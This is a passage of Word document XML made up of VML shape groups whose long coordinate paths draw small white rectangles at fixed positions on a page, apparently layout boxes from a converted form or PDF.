,2678,12618,2680,12618,2682,12618,2684,12618,2686,12618,2688,12618,2690,12618,2692,12618,2694,12618,2696,12618,2698,12618,2700,12618,2702,12618,2705,12618,2707,12618,2709,12618,2712,12618,2714,12618,2717,12618,2719,12618,2722,12618,2724,12618,2724,12618,2724,12618,2724,12618,2724,12618,2724,12618,2724,12618,2724,12618,2724,12618,2724,12618,2724,12618,2724,12618,2724,12618,2724,12618,2724,12619,2724,12619,2724,12619,2724,12619,2724,12619,2724,12619,2724,12619,2724,12619,2724,12619,2724,12620,2724,12620,2724,12620,2724,12620,2724,12621,2724,12621,2724,12621,2724,12621,2724,12622,2724,12622,2724,12623,2724,12623,2724,12623,2724,12624,2724,12624,2724,12625,2724,12625,2724,12626,2724,12627,2724,12627,2724,12628,2724,12629,2724,12629,2724,12630,2724,12631,2724,12632,2724,12633,2724,12634,2724,12635,2724,12636,2724,12637,2724,12638,2724,12639,2724,12640,2724,12641,2724,12642,2724,12644,2724,12645,2724,12646,2724,12648,2724,12649,2724,12651,2724,12653,2724,12654,2724,12656,2724,12658,2724,12659,2724,12661,2724,12663,2724,12665,2724,12667,2724,12669,2724,12671,2724,12673,2724,12676,2724,12678,2724,12680,2724,12683,2724,12685,2724,12688,2724,12690,2724,12693,2724,12696,2724,12699,2724,12701,2724,12704,2724,12707,2724,12710,2724,12714,2724,12717,2724,12720,2724,12723,2724,12727,2724,12730,2724,12734,2724,12738,2724,12741,2724,12745,2724,12749,2724,12753,2724,12757,2724,12761,2724,12765,2724,12770,2724,12774,2724,12778,2724,12783,2724,12788,2724,12792,2724,12797,2724,12802,2724,12807,2724,12812,2724,12817,2724,12822,2724,12828,2724,12833,2724,12839,2724,12839,2724,12839,2724,12839,2724,12839,2724,12839,2724,12839,2724,12839,2724,12839,2724,12839,2724,12839,2724,12839,2724,12839,2724,12839,2724,12839,2724,12839,2724,12839,2724,12839,2724,12839,2724,12839,2724,12839,2724,12839,2724,12839,2724,12839,2723,12839,2723,12839,2723,12839,2723,12839,2723,12839,2723,12839,2723,12839,2722,12839,2722,12839,2722,12839,2722,12839,2722,12839,2722,12839,2721,12839,2721,12839,2721,12839,2721,12839,2720,12839,2720,12839,2720,12839,2719,12839,2719,12839,2719,12839,2718,12839,2718,12839,2717,12839,2717,12839,2716,12839,2716,12839,2716,12839,2715,12839,2714,12839,2714,12839,2713,12839,2713,12839,2712,12839,2712,12839,2711,12839,2710,12839,2709,12839,2709,12839,2708,12839,2707,12839,2706,12839,2706,12839,2705,12839,2704,12839,2703,12839,2702,12839,2701,12839,2700,12839,2699,12839,2698,12839,2697,12839,2696,12839,2695,12839,2694,12839,2693,12839,2691,12839,2690,12839,2689,12839,2688,12839,2686,12839,2685,12839,2684,12839,2682,12839,2681,12839,2679,12839,2678,12839,2676,12839,2675,12839,2673,12839,2671,12839,2670,12839,2668,12839,2666,12839,2664,12839,2663,12839,2661,12839,2659,12839,2657,12839,2655,12839,2653,12839,2651,12839,2649,12839,2647,12839,2644,12839,2642,12839,2640,12839,2638,12839,2635,12839,2633,12839,2631,12839,2628,12839,2626,12839,2623,12839,2620,12839,2620,12839,2620,12839,2620,12839,2620,12839,2620,12839,2620,12839,2620,12839,2620,12839,2620,12839,2620,12839,2620,12839,2620,12838,2620,12838,2620,12838,2620,12838,2620,12838,2620,12838,2620,12838,2620,12838,2620,12838,2620,12838,2620,12837,2620,12837,2620,12837,2620,12837,2620,12837,2620,12836,2620,12836,2620,12836,2620,12835,2620,12835,2620,12835,2620,12834,2620,12834,2620,12834,2620,12833,2620,12833,2620,12832,2620,12831,2620,12831,2620,12830,2620,12830,2620,12829,2620,12828,2620,12828,2620,12827,2620,12826,2620,12825,2620,12824,2620,12823,2620,12822,2620,12821,2620,12820,2620,12819,2620,12818,2620,12817,2620,12816,2620,12814,2620,12813,2620,12812,2620,12810,2620,12809,2620,12807,2620,12806,2620,12804,2620,12803,2620,12801,2620,12799,2620,12798,2620,12796,2620,12794,2620,12792,2620,12790,2620,12788,2620,12786,2620,12783,2620,12781,2620,12779,2620,12777,2620,12774,2620,12772,2620,12769,2620,12767,2620,12764,2620,12761,2620,12758,2620,12755,2620,12753,2620,12750,2620,12746,2620,12743,2620,12740,2620,12737,2620,12733,2620,12730,2620,12727,2620,12723,2620,12719,2620,12716,2620,12712,2620,12708,2620,12704,2620,12700,2620,12696,2620,12692,2620,12687,2620,12683,2620,12678,2620,12674,2620,12669,2620,12665,2620,12660,2620,12655,2620,12650,2620,12645,2620,12640,2620,12634,2620,12629,2620,12624,2620,12618e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:109.500pt;margin-top:657.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2190,13150" coordsize="110,230">
        <v:shape style="position:absolute;left:2190;top:13150;width:110;height:230" coordorigin="2190,13150" coordsize="110,230" path="m2205,13163l2205,13163,2205,13163,2205,13163,2205,13163,2205,13163,2205,13163,2205,13163,2205,13163,2205,13163,2206,13163,2206,13163,2206,13163,2206,13163,2206,13163,2206,13163,2206,13163,2206,13163,2206,13163,2206,13163,2206,13163,2206,13163,2206,13163,2206,13163,2206,13163,2206,13163,2206,13163,2207,13163,2207,13163,2207,13163,2207,13163,2207,13163,2207,13163,2207,13163,2208,13163,2208,13163,2208,13163,2208,13163,2209,13163,2209,13163,2209,13163,2209,13163,2210,13163,2210,13163,2210,13163,2211,13163,2211,13163,2211,13163,2212,13163,2212,13163,2213,13163,2213,13163,2214,13163,2214,13163,2215,13163,2215,13163,2216,13163,2216,13163,2217,13163,2217,13163,2218,13163,2219,13163,2219,13163,2220,13163,2221,13163,2222,13163,2222,13163,2223,13163,2224,13163,2225,13163,2226,13163,2227,13163,2227,13163,2228,13163,2229,13163,2230,13163,2231,13163,2232,13163,2234,13163,2235,13163,2236,13163,2237,13163,2238,13163,2239,13163,2241,13163,2242,13163,2243,13163,2245,13163,2246,13163,2247,13163,2249,13163,2250,13163,2252,13163,2253,13163,2255,13163,2257,13163,2258,13163,2260,13163,2262,13163,2263,13163,2265,13163,2267,13163,2269,13163,2271,13163,2273,13163,2275,13163,2277,13163,2279,13163,2281,13163,2283,13163,2285,13163,2287,13163,2290,13163,2292,13163,2294,13163,2297,13163,2299,13163,2302,13163,2304,13163,2307,13163,2309,13163,2309,13163,2309,13163,2309,13163,2309,13163,2309,13163,2309,13163,2309,13163,2309,13163,2309,13163,2309,13163,2309,13163,2309,13163,2309,13163,2309,13163,2309,13163,2309,13163,2309,13163,2309,13163,2309,13164,2309,13164,2309,13164,2309,13164,2309,13164,2309,13164,2309,13165,2309,13165,2309,13165,2309,13165,2309,13166,2309,13166,2309,13166,2309,13167,2309,13167,2309,13168,2309,13168,2309,13168,2309,13169,2309,13169,2309,13170,2309,13171,2309,13171,2309,13172,2309,13173,2309,13173,2309,13174,2309,13175,2309,13176,2309,13176,2309,13177,2309,13178,2309,13179,2309,13180,2309,13181,2309,13182,2309,13183,2309,13185,2309,13186,2309,13187,2309,13188,2309,13190,2309,13191,2309,13193,2309,13194,2309,13196,2309,13197,2309,13199,2309,13200,2309,13202,2309,13204,2309,13206,2309,13208,2309,13210,2309,13212,2309,13214,2309,13216,2309,13218,2309,13220,2309,13223,2309,13225,2309,13227,2309,13230,2309,13232,2309,13235,2309,13238,2309,13240,2309,13243,2309,13246,2309,13249,2309,13252,2309,13255,2309,13258,2309,13261,2309,13265,2309,13268,2309,13271,2309,13275,2309,13279,2309,13282,2309,13286,2309,13290,2309,13294,2309,13298,2309,13302,2309,13306,2309,13310,2309,13314,2309,13319,2309,13323,2309,13328,2309,13332,2309,13337,2309,13342,2309,13347,2309,13352,2309,13357,2309,13362,2309,13367,2309,13372,2309,13378,2309,13383,2309,13383,2309,13383,2309,13383,2309,13383,2309,13383,2309,13383,2309,13383,2309,13383,2309,13383,2309,13383,2309,13383,2309,13383,2309,13383,2309,13383,2309,13383,2309,13383,2309,13383,2309,13383,2309,13383,2309,13383,2309,13383,2309,13383,2309,13383,2308,13383,2308,13383,2308,13383,2308,13383,2308,13383,2308,13383,2308,13383,2308,13383,2307,13383,2307,13383,2307,13383,2307,13383,2307,13383,2306,13383,2306,13383,2306,13383,2306,13383,2305,13383,2305,13383,2305,13383,2304,13383,2304,13383,2304,13383,2303,13383,2303,13383,2302,13383,2302,13383,2302,13383,2301,13383,2301,13383,2300,13383,2300,13383,2299,13383,2298,13383,2298,13383,2297,13383,2297,13383,2296,13383,2295,13383,2295,13383,2294,13383,2293,13383,2292,13383,2292,13383,2291,13383,2290,13383,2289,13383,2288,13383,2287,13383,2286,13383,2285,13383,2284,13383,2283,13383,2282,13383,2281,13383,2280,13383,2279,13383,2278,13383,2276,13383,2275,13383,2274,13383,2273,13383,2271,13383,2270,13383,2269,13383,2267,13383,2266,13383,2264,13383,2263,13383,2261,13383,2260,13383,2258,13383,2256,13383,2255,13383,2253,13383,2251,13383,2249,13383,2248,13383,2246,13383,2244,13383,2242,13383,2240,13383,2238,13383,2236,13383,2234,13383,2232,13383,2229,13383,2227,13383,2225,13383,2223,13383,2220,13383,2218,13383,2216,13383,2213,13383,2211,13383,2208,13383,2205,13383,2205,13383,2205,13383,2205,13383,2205,13383,2205,13383,2205,13383,2205,13383,2205,13383,2205,13383,2205,13383,2205,13383,2205,13383,2205,13383,2205,13383,2205,13383,2205,13383,2205,13383,2205,13383,2205,13383,2205,13382,2205,13382,2205,13382,2205,13382,2205,13382,2205,13381,2205,13381,2205,13381,2205,13381,2205,13380,2205,13380,2205,13380,2205,13379,2205,13379,2205,13379,2205,13378,2205,13378,2205,13377,2205,13377,2205,13376,2205,13376,2205,13375,2205,13374,2205,13374,2205,13373,2205,13372,2205,13371,2205,13371,2205,13370,2205,13369,2205,13368,2205,13367,2205,13366,2205,13365,2205,13364,2205,13363,2205,13362,2205,13360,2205,13359,2205,13358,2205,13356,2205,13355,2205,13354,2205,13352,2205,13351,2205,13349,2205,13347,2205,13346,2205,13344,2205,13342,2205,13340,2205,13338,2205,13336,2205,13334,2205,13332,2205,13330,2205,13328,2205,13326,2205,13324,2205,13321,2205,13319,2205,13316,2205,13314,2205,13311,2205,13308,2205,13306,2205,13303,2205,13300,2205,13297,2205,13294,2205,13291,2205,13288,2205,13285,2205,13281,2205,13278,2205,13275,2205,13271,2205,13268,2205,13264,2205,13260,2205,13256,2205,13252,2205,13249,2205,13244,2205,13240,2205,13236,2205,13232,2205,13227,2205,13223,2205,13218,2205,13214,2205,13209,2205,13204,2205,13200,2205,13195,2205,13189,2205,13184,2205,13179,2205,13174,2205,13168,2205,13163e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:130.500pt;margin-top:657.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2610,13150" coordsize="110,230">
        <v:shape style="position:absolute;left:2610;top:13150;width:110;height:230" coordorigin="2610,13150" coordsize="110,230" path="m2620,13163l2620,13163,2620,13163,2620,13163,2620,13163,2620,13163,2620,13163,2620,13163,2620,13163,2620,13163,2620,13163,2620,13163,2620,13163,2621,13163,2621,13163,2621,13163,2621,13163,2621,13163,2621,13163,2621,13163,2621,13163,2621,13163,2621,13163,2621,13163,2621,13163,2621,13163,2621,13163,2621,13163,2622,13163,2622,13163,2622,13163,2622,13163,2622,13163,2622,13163,2623,13163,2623,13163,2623,13163,2623,13163,2624,13163,2624,13163,2624,13163,2624,13163,2625,13163,2625,13163,2625,13163,2626,13163,2626,13163,2626,13163,2627,13163,2627,13163,2628,13163,2628,13163,2629,13163,2629,13163,2630,13163,2630,13163,2631,13163,2631,13163,2632,13163,2632,13163,2633,13163,2634,13163,2634,13163,2635,13163,2636,13163,2637,13163,2637,13163,2638,13163,2639,13163,2640,13163,2641,13163,2642,13163,2642,13163,2643,13163,2644,13163,2645,13163,2646,13163,2647,13163,2649,13163,2650,13163,2651,13163,2652,13163,2653,13163,2654,13163,2656,13163,2657,13163,2658,13163,2660,13163,2661,13163,2662,13163,2664,13163,2665,13163,2667,13163,2668,13163,2670,13163,2672,13163,2673,13163,2675,13163,2677,13163,2678,13163,2680,13163,2682,13163,2684,13163,2686,13163,2688,13163,2690,13163,2692,13163,2694,13163,2696,13163,2698,13163,2700,13163,2702,13163,2705,13163,2707,13163,2709,13163,2712,13163,2714,13163,2717,13163,2719,13163,2722,13163,2724,13163,2724,13163,2724,13163,2724,13163,2724,13163,2724,13163,2724,13163,2724,13163,2724,13163,2724,13163,2724,13163,2724,13163,2724,13163,2724,13163,2724,13163,2724,13163,2724,13163,2724,13163,2724,13163,2724,13164,2724,13164,2724,13164,2724,13164,2724,13164,2724,13164,2724,13165,2724,13165,2724,13165,2724,13165,2724,13166,2724,13166,2724,13166,2724,13167,2724,13167,2724,13168,2724,13168,2724,13168,2724,13169,2724,13169,2724,13170,2724,13171,2724,13171,2724,13172,2724,13173,2724,13173,2724,13174,2724,13175,2724,13176,2724,13176,2724,13177,2724,13178,2724,13179,2724,13180,2724,13181,2724,13182,2724,13183,2724,13185,2724,13186,2724,13187,2724,13188,2724,13190,2724,13191,2724,13193,2724,13194,2724,13196,2724,13197,2724,13199,2724,13200,2724,13202,2724,13204,2724,13206,2724,13208,2724,13210,2724,13212,2724,13214,2724,13216,2724,13218,2724,13220,2724,13223,2724,13225,2724,13227,2724,13230,2724,13232,2724,13235,2724,13238,2724,13240,2724,13243,2724,13246,2724,13249,2724,13252,2724,13255,2724,13258,2724,13261,2724,13265,2724,13268,2724,13271,2724,13275,2724,13279,2724,13282,2724,13286,2724,13290,2724,13294,2724,13298,2724,13302,2724,13306,2724,13310,2724,13314,2724,13319,2724,13323,2724,13328,2724,13332,2724,13337,2724,13342,2724,13347,2724,13352,2724,13357,2724,13362,2724,13367,2724,13372,2724,13378,2724,13383,2724,13383,2724,13383,2724,13383,2724,13383,2724,13383,2724,13383,2724,13383,2724,13383,2724,13383,2724,13383,2724,13383,2724,13383,2724,13383,2724,13383,2724,13383,2724,13383,2724,13383,2724,13383,2724,13383,2724,13383,2724,13383,2724,13383,2724,13383,2723,13383,2723,13383,2723,13383,2723,13383,2723,13383,2723,13383,2723,13383,2722,13383,2722,13383,2722,13383,2722,13383,2722,13383,2722,13383,2721,13383,2721,13383,2721,13383,2721,13383,2720,13383,2720,13383,2720,13383,2719,13383,2719,13383,2719,13383,2718,13383,2718,13383,2717,13383,2717,13383,2716,13383,2716,13383,2716,13383,2715,13383,2714,13383,2714,13383,2713,13383,2713,13383,2712,13383,2712,13383,2711,13383,2710,13383,2709,13383,2709,13383,2708,13383,2707,13383,2706,13383,2706,13383,2705,13383,2704,13383,2703,13383,2702,13383,2701,13383,2700,13383,2699,13383,2698,13383,2697,13383,2696,13383,2695,13383,2694,13383,2693,13383,2691,13383,2690,13383,2689,13383,2688,13383,2686,13383,2685,13383,2684,13383,2682,13383,2681,13383,2679,13383,2678,13383,2676,13383,2675,13383,2673,13383,2671,13383,2670,13383,2668,13383,2666,13383,2664,13383,2663,13383,2661,13383,2659,13383,2657,13383,2655,13383,2653,13383,2651,13383,2649,13383,2647,13383,2644,13383,2642,13383,2640,13383,2638,13383,2635,13383,2633,13383,2631,13383,2628,13383,2626,13383,2623,13383,2620,13383,2620,13383,2620,13383,2620,13383,2620,13383,2620,13383,2620,13383,2620,13383,2620,13383,2620,13383,2620,13383,2620,13383,2620,13383,2620,13383,2620,13383,2620,13383,2620,13383,2620,13383,2620,13383,2620,13383,2620,13382,2620,13382,2620,13382,2620,13382,2620,13382,2620,13381,2620,13381,2620,13381,2620,13381,2620,13380,2620,13380,2620,13380,2620,13379,2620,13379,2620,13379,2620,13378,2620,13378,2620,13377,2620,13377,2620,13376,2620,13376,2620,13375,2620,13374,2620,13374,2620,13373,2620,13372,2620,13371,2620,13371,2620,13370,2620,13369,2620,13368,2620,13367,2620,13366,2620,13365,2620,13364,2620,13363,2620,13362,2620,13360,2620,13359,2620,13358,2620,13356,2620,13355,2620,13354,2620,13352,2620,13351,2620,13349,2620,13347,2620,13346,2620,13344,2620,13342,2620,13340,2620,13338,2620,13336,2620,13334,2620,13332,2620,13330,2620,13328,2620,13326,2620,13324,2620,13321,2620,13319,2620,13316,2620,13314,2620,13311,2620,13308,2620,13306,2620,13303,2620,13300,2620,13297,2620,13294,2620,13291,2620,13288,2620,13285,2620,13281,2620,13278,2620,13275,2620,13271,2620,13268,2620,13264,2620,13260,2620,13256,2620,13252,2620,13249,2620,13244,2620,13240,2620,13236,2620,13232,2620,13227,2620,13223,2620,13218,2620,13214,2620,13209,2620,13204,2620,13200,2620,13195,2620,13189,2620,13184,2620,13179,2620,13174,2620,13168,2620,13163e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:109.500pt;margin-top:685.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2190,13710" coordsize="110,230">
        <v:shape style="position:absolute;left:2190;top:13710;width:110;height:230" coordorigin="2190,13710" coordsize="110,230" path="m2205,13720l2205,13720,2205,13720,2205,13720,2205,13720,2205,13720,2205,13720,2205,13720,2205,13720,2205,13720,2206,13720,2206,13720,2206,13720,2206,13720,2206,13720,2206,13720,2206,13720,2206,13720,2206,13720,2206,13720,2206,13720,2206,13720,2206,13720,2206,13720,2206,13720,2206,13720,2206,13720,2207,13720,2207,13720,2207,13720,2207,13720,2207,13720,2207,13720,2207,13720,2208,13720,2208,13720,2208,13720,2208,13720,2209,13720,2209,13720,2209,13720,2209,13720,2210,13720,2210,13720,2210,13720,2211,13720,2211,13720,2211,13720,2212,13720,2212,13720,2213,13720,2213,13720,2214,13720,2214,13720,2215,13720,2215,13720,2216,13720,2216,13720,2217,13720,2217,13720,2218,13720,2219,13720,2219,13720,2220,13720,2221,13720,2222,13720,2222,13720,2223,13720,2224,13720,2225,13720,2226,13720,2227,13720,2227,13720,2228,13720,2229,13720,2230,13720,2231,13720,2232,13720,2234,13720,2235,13720,2236,13720,2237,13720,2238,13720,2239,13720,2241,13720,2242,13720,2243,13720,2245,13720,2246,13720,2247,13720,2249,13720,2250,13720,2252,13720,2253,13720,2255,13720,2257,13720,2258,13720,2260,13720,2262,13720,2263,13720,2265,13720,2267,13720,2269,13720,2271,13720,2273,13720,2275,13720,2277,13720,2279,13720,2281,13720,2283,13720,2285,13720,2287,13720,2290,13720,2292,13720,2294,13720,2297,13720,2299,13720,2302,13720,2304,13720,2307,13720,2309,13720,2309,13720,2309,13720,2309,13720,2309,13720,2309,13720,2309,13720,2309,13720,2309,13720,2309,13721,2309,13721,2309,13721,2309,13721,2309,13721,2309,13721,2309,13721,2309,13721,2309,13721,2309,13721,2309,13721,2309,13721,2309,13721,2309,13722,2309,13722,2309,13722,2309,13722,2309,13722,2309,13723,2309,13723,2309,13723,2309,13724,2309,13724,2309,13724,2309,13725,2309,13725,2309,13726,2309,13726,2309,13727,2309,13727,2309,13728,2309,13728,2309,13729,2309,13729,2309,13730,2309,13731,2309,13732,2309,13732,2309,13733,2309,13734,2309,13735,2309,13736,2309,13737,2309,13738,2309,13739,2309,13740,2309,13741,2309,13742,2309,13743,2309,13745,2309,13746,2309,13747,2309,13749,2309,13750,2309,13752,2309,13753,2309,13755,2309,13756,2309,13758,2309,13760,2309,13762,2309,13763,2309,13765,2309,13767,2309,13769,2309,13771,2309,13773,2309,13776,2309,13778,2309,13780,2309,13783,2309,13785,2309,13787,2309,13790,2309,13793,2309,13795,2309,13798,2309,13801,2309,13804,2309,13807,2309,13810,2309,13813,2309,13816,2309,13819,2309,13822,2309,13826,2309,13829,2309,13833,2309,13836,2309,13840,2309,13844,2309,13847,2309,13851,2309,13855,2309,13859,2309,13863,2309,13868,2309,13872,2309,13876,2309,13881,2309,13885,2309,13890,2309,13895,2309,13899,2309,13904,2309,13909,2309,13914,2309,13919,2309,13925,2309,13930,2309,13935,2309,13941,2309,13941,2309,13941,2309,13941,2309,13941,2309,13941,2309,13941,2309,13941,2309,13941,2309,13941,2309,13941,2309,13941,2309,13941,2309,13941,2309,13941,2309,13941,2309,13941,2309,13941,2309,13941,2309,13941,2309,13941,2309,13941,2309,13941,2309,13941,2308,13941,2308,13941,2308,13941,2308,13941,2308,13941,2308,13941,2308,13941,2308,13941,2307,13941,2307,13941,2307,13941,2307,13941,2307,13941,2306,13941,2306,13941,2306,13941,2306,13941,2305,13941,2305,13941,2305,13941,2304,13941,2304,13941,2304,13941,2303,13941,2303,13941,2302,13941,2302,13941,2302,13941,2301,13941,2301,13941,2300,13941,2300,13941,2299,13941,2298,13941,2298,13941,2297,13941,2297,13941,2296,13941,2295,13941,2295,13941,2294,13941,2293,13941,2292,13941,2292,13941,2291,13941,2290,13941,2289,13941,2288,13941,2287,13941,2286,13941,2285,13941,2284,13941,2283,13941,2282,13941,2281,13941,2280,13941,2279,13941,2278,13941,2276,13941,2275,13941,2274,13941,2273,13941,2271,13941,2270,13941,2269,13941,2267,13941,2266,13941,2264,13941,2263,13941,2261,13941,2260,13941,2258,13941,2256,13941,2255,13941,2253,13941,2251,13941,2249,13941,2248,13941,2246,13941,2244,13941,2242,13941,2240,13941,2238,13941,2236,13941,2234,13941,2232,13941,2229,13941,2227,13941,2225,13941,2223,13941,2220,13941,2218,13941,2216,13941,2213,13941,2211,13941,2208,13941,2205,13941,2205,13941,2205,13941,2205,13941,2205,13941,2205,13941,2205,13941,2205,13941,2205,13941,2205,13941,2205,13941,2205,13941,2205,13941,2205,13941,2205,13941,2205,13941,2205,13940,2205,13940,2205,13940,2205,13940,2205,13940,2205,13940,2205,13940,2205,13939,2205,13939,2205,13939,2205,13939,2205,13939,2205,13938,2205,13938,2205,13938,2205,13937,2205,13937,2205,13937,2205,13936,2205,13936,2205,13935,2205,13935,2205,13934,2205,13934,2205,13933,2205,13933,2205,13932,2205,13931,2205,13930,2205,13930,2205,13929,2205,13928,2205,13927,2205,13926,2205,13925,2205,13925,2205,13924,2205,13922,2205,13921,2205,13920,2205,13919,2205,13918,2205,13917,2205,13915,2205,13914,2205,13913,2205,13911,2205,13910,2205,13908,2205,13907,2205,13905,2205,13903,2205,13902,2205,13900,2205,13898,2205,13896,2205,13894,2205,13892,2205,13890,2205,13888,2205,13886,2205,13883,2205,13881,2205,13879,2205,13876,2205,13874,2205,13871,2205,13869,2205,13866,2205,13863,2205,13861,2205,13858,2205,13855,2205,13852,2205,13849,2205,13846,2205,13842,2205,13839,2205,13836,2205,13832,2205,13829,2205,13825,2205,13821,2205,13818,2205,13814,2205,13810,2205,13806,2205,13802,2205,13798,2205,13794,2205,13789,2205,13785,2205,13781,2205,13776,2205,13771,2205,13767,2205,13762,2205,13757,2205,13752,2205,13747,2205,13742,2205,13737,2205,13731,2205,13726,2205,13720e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:130.500pt;margin-top:685.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2610,13710" coordsize="110,230">
        <v:shape style="position:absolute;left:2610;top:13710;width:110;height:230" coordorigin="2610,13710" coordsize="110,230" path="m2620,13720l2620,13720,2620,13720,2620,13720,2620,13720,2620,13720,2620,13720,2620,13720,2620,13720,2620,13720,2620,13720,2620,13720,2620,13720,2621,13720,2621,13720,2621,13720,2621,13720,2621,13720,2621,13720,2621,13720,2621,13720,2621,13720,2621,13720,2621,13720,2621,13720,2621,13720,2621,13720,2621,13720,2622,13720,2622,13720,2622,13720,2622,13720,2622,13720,2622,13720,2623,13720,2623,13720,2623,13720,2623,13720,2624,13720,2624,13720,2624,13720,2624,13720,2625,13720,2625,13720,2625,13720,2626,13720,2626,13720,2626,13720,2627,13720,2627,13720,2628,13720,2628,13720,2629,13720,2629,13720,2630,13720,2630,13720,2631,13720,2631,13720,2632,13720,2632,13720,2633,13720,2634,13720,2634,13720,2635,13720,2636,13720,2637,13720,2637,13720,2638,13720,2639,13720,2640,13720,2641,13720,2642,13720,2642,13720,2643,13720,2644,13720,2645,13720,2646,13720,2647,13720,2649,13720,2650,13720,2651,13720,2652,13720,2653,13720,2654,13720,2656,13720,2657,13720,2658,13720,2660,13720,2661,13720,2662,13720,2664,13720,2665,13720,2667,13720,2668,13720,2670,13720,2672,13720,2673,13720,2675,13720,2677,13720,2678,13720,2680,13720,2682,13720,2684,13720,2686,13720,2688,13720,2690,13720,2692,13720,2694,13720,2696,13720,2698,13720,2700,13720,2702,13720,2705,13720,2707,13720,2709,13720,2712,13720,2714,13720,2717,13720,2719,13720,2722,13720,2724,13720,2724,13720,2724,13720,2724,13720,2724,13720,2724,13720,2724,13720,2724,13720,2724,13720,2724,13721,2724,13721,2724,13721,2724,13721,2724,13721,2724,13721,2724,13721,2724,13721,2724,13721,2724,13721,2724,13721,2724,13721,2724,13721,2724,13722,2724,13722,2724,13722,2724,13722,2724,13722,2724,13723,2724,13723,2724,13723,2724,13724,2724,13724,2724,13724,2724,13725,2724,13725,2724,13726,2724,13726,2724,13727,2724,13727,2724,13728,2724,13728,2724,13729,2724,13729,2724,13730,2724,13731,2724,13732,2724,13732,2724,13733,2724,13734,2724,13735,2724,13736,2724,13737,2724,13738,2724,13739,2724,13740,2724,13741,2724,13742,2724,13743,2724,13745,2724,13746,2724,13747,2724,13749,2724,13750,2724,13752,2724,13753,2724,13755,2724,13756,2724,13758,2724,13760,2724,13762,2724,13763,2724,13765,2724,13767,2724,13769,2724,13771,2724,13773,2724,13776,2724,13778,2724,13780,2724,13783,2724,13785,2724,13787,2724,13790,2724,13793,2724,13795,2724,13798,2724,13801,2724,13804,2724,13807,2724,13810,2724,13813,2724,13816,2724,13819,2724,13822,2724,13826,2724,13829,2724,13833,2724,13836,2724,13840,2724,13844,2724,13847,2724,13851,2724,13855,2724,13859,2724,13863,2724,13868,2724,13872,2724,13876,2724,13881,2724,13885,2724,13890,2724,13895,2724,13899,2724,13904,2724,13909,2724,13914,2724,13919,2724,13925,2724,13930,2724,13935,2724,13941,2724,13941,2724,13941,2724,13941,2724,13941,2724,13941,2724,13941,2724,13941,2724,13941,2724,13941,2724,13941,2724,13941,2724,13941,2724,13941,2724,13941,2724,13941,2724,13941,2724,13941,2724,13941,2724,13941,2724,13941,2724,13941,2724,13941,2724,13941,2723,13941,2723,13941,2723,13941,2723,13941,2723,13941,2723,13941,2723,13941,2722,13941,2722,13941,2722,13941,2722,13941,2722,13941,2722,13941,2721,13941,2721,13941,2721,13941,2721,13941,2720,13941,2720,13941,2720,13941,2719,13941,2719,13941,2719,13941,2718,13941,2718,13941,2717,13941,2717,13941,2716,13941,2716,13941,2716,13941,2715,13941,2714,13941,2714,13941,2713,13941,2713,13941,2712,13941,2712,13941,2711,13941,2710,13941,2709,13941,2709,13941,2708,13941,2707,13941,2706,13941,2706,13941,2705,13941,2704,13941,2703,13941,2702,13941,2701,13941,2700,13941,2699,13941,2698,13941,2697,13941,2696,13941,2695,13941,2694,13941,2693,13941,2691,13941,2690,13941,2689,13941,2688,13941,2686,13941,2685,13941,2684,13941,2682,13941,2681,13941,2679,13941,2678,13941,2676,13941,2675,13941,2673,13941,2671,13941,2670,13941,2668,13941,2666,13941,2664,13941,2663,13941,2661,13941,2659,13941,2657,13941,2655,13941,2653,13941,2651,13941,2649,13941,2647,13941,2644,13941,2642,13941,2640,13941,2638,13941,2635,13941,2633,13941,2631,13941,2628,13941,2626,13941,2623,13941,2620,13941,2620,13941,2620,13941,2620,13941,2620,13941,2620,13941,2620,13941,2620,13941,2620,13941,2620,13941,2620,13941,2620,13941,2620,13941,2620,13941,2620,13941,2620,13941,2620,13940,2620,13940,2620,13940,2620,13940,2620,13940,2620,13940,2620,13940,2620,13939,2620,13939,2620,13939,2620,13939,2620,13939,2620,13938,2620,13938,2620,13938,2620,13937,2620,13937,2620,13937,2620,13936,2620,13936,2620,13935,2620,13935,2620,13934,2620,13934,2620,13933,2620,13933,2620,13932,2620,13931,2620,13930,2620,13930,2620,13929,2620,13928,2620,13927,2620,13926,2620,13925,2620,13925,2620,13924,2620,13922,2620,13921,2620,13920,2620,13919,2620,13918,2620,13917,2620,13915,2620,13914,2620,13913,2620,13911,2620,13910,2620,13908,2620,13907,2620,13905,2620,13903,2620,13902,2620,13900,2620,13898,2620,13896,2620,13894,2620,13892,2620,13890,2620,13888,2620,13886,2620,13883,2620,13881,2620,13879,2620,13876,2620,13874,2620,13871,2620,13869,2620,13866,2620,13863,2620,13861,2620,13858,2620,13855,2620,13852,2620,13849,2620,13846,2620,13842,2620,13839,2620,13836,2620,13832,2620,13829,2620,13825,2620,13821,2620,13818,2620,13814,2620,13810,2620,13806,2620,13802,2620,13798,2620,13794,2620,13789,2620,13785,2620,13781,2620,13776,2620,13771,2620,13767,2620,13762,2620,13757,2620,13752,2620,13747,2620,13742,2620,13737,2620,13731,2620,13726,2620,13720e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:109.500pt;margin-top:712.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2190,14250" coordsize="110,230">
